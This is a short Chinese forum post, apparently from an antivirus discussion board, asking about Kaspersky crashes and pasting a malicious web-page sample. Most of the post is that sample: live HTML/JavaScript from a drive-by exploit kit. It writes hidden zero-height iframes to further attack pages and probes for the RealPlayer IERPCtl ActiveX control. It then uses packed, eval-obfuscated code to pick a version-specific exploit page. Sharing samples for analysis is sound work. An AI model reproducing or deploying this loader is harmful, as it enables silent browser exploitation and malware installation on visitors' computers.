如果是替换beep.sys这类的病毒卡巴交互模式可以拦截的,是不是设定或者遇到资源冲突导致的crashed
附此样本
只是一个带有恶意代码的script而已,所以应该导致崩溃的不是这个样本,而是下载后的样本
<script src="../xnnn.js"></script>
<script src="../zhin.js"></script>
<html>
<script>
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=../14.htm></iframe>");
document.write("<iframe width=100 height=0 src=fx.htm></iframe>");
document.write("<iframe width=100 height=0 src=../active.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=../cx.htm width=100 height=0></iframe>");
function WoAYuTian()
{
YuTian = "IERPCtl.IER"+"PCtl.1";
try
{
YiTn = new ActiveXObject(YuTian);
}catch(error){return;}
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('8 = 9.6("5"+"7");e(8<="4.0.2.3")a.k("<f j=1 c=0 i=../g.d></f>");b a.k("<f j=1 c=0 i=../h.d></f>");',62,21,'|100|14|552|6|PRODUCTVE|PlayerProperty|RSION|Tellm|YiTn|document|else|height|htm|if|iframe|real10|real11|src|width|write'.split('|'),0,{}))
}
WoAYuTian();
</script>
<script src=../wewew.js></script>
</html> |